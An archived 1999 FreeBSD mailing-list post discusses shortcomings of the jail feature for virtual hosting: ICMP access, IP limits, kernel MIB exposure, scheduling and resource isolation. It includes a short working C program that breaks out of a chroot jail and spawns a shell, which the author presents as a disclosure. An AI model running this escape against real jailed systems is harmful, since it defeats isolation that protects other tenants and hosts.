Date: Sat, 25 Sep 1999 17:17:12 +0400 From: Alexander Bezroutchko <abb@zenon.net> To: freebsd-security@freebsd.org, freebsd-hackers@freebsd.org Subject: about jail Message-ID: <19990925171712.A80535@zenon.net> In-Reply-To: <199909251302.RAA58030@grendel.sovlink.ru>; from NT User on Sat, Sep 25, 1999 at 05:02:30PM %2B0400 References: <199909251302.RAA58030@grendel.sovlink.ru>
next in thread | previous in thread | raw e-mail | index | archive | help
Hello,
I am looking for a way to use jail feature (when it will be back ported to
-STABLE) for providing virtual servers with root access (something like
www.servetheweb.com). Therefore I am investigating this feature more closely.
For now I have encountered following problems:
* ping, traceroute doesn't work due to lack of permissionis to create icmp socket.
I think it is simple to make workaround for such problems:
create a daemon listening on a unix domain socket for request from a jail.
Daemon will take request and the pid of requesting process, validate it,
process and return answer to client.
* only one IP address is available in jail
It is acceptable limitation, but some daemons would like to use localhost
address (127.0.0.1).
* whole kernel MIB is readable, and kern.hostname is writable from jail
I think we should restrict information about system available from jail --
leave readable only data required for proper work of libc
functions like gethostname,getpagesize,sysconf, etc.
If we leave kern.hostname writable from jail, we should
add new field to `struct jail', say `jailname'. It is necessary to
iidentify exactly which jail a process belongs to. And
/proc/<PID>/status must show this value. (I think it will be
useful to add displaying `jailname' to ps and probably top).
* scheduling
Scheduler must provide equal time quantum to each jail. I think
something like "fair share scheduler" required. Is there any plans
to implement such scheme in FreeBSD ?
* resource limits
Current resource limit scheme does not provide enough isolation of jails.
For example, chgproccnt() maintains counters of number of process per uid,
but it they are system-wide. So number of process running in one jail
will affect fork() at another jail. Also it would be great to have
ability to limit number of simultaneous processes running in jail and
memory consumed by whole jail.
* it is possible to escape from jail
Following program escapes from jail (tested under 4.0-19990918-CURRENT):
/* --- start of example ------------------------- */
#include <unistd.h>
#include <assert.h>
const char *shell = "/bin/sh";
const char *lowerdir = "/tmp";
int main() {
int i;
assert(chdir("/") != -1);
assert(chroot(lowerdir) != -1);
for (i = 0; i < 32; i++)
assert(chdir("..") != -1);
assert(chroot(".") != -1);
assert(execl(shell, shell, NULL) != -1);
};
/* --- end of example --------------------------- */
Does anybody know where I can find more information about
well known methods of breaking chroot ?
Does anybody already encountered and solved problems described above
or have an ideas ?
--
Alexander Bezroutchko, Systems Administrator, Zenon N.S.P.
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-hackers" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?19990925171712.A80535>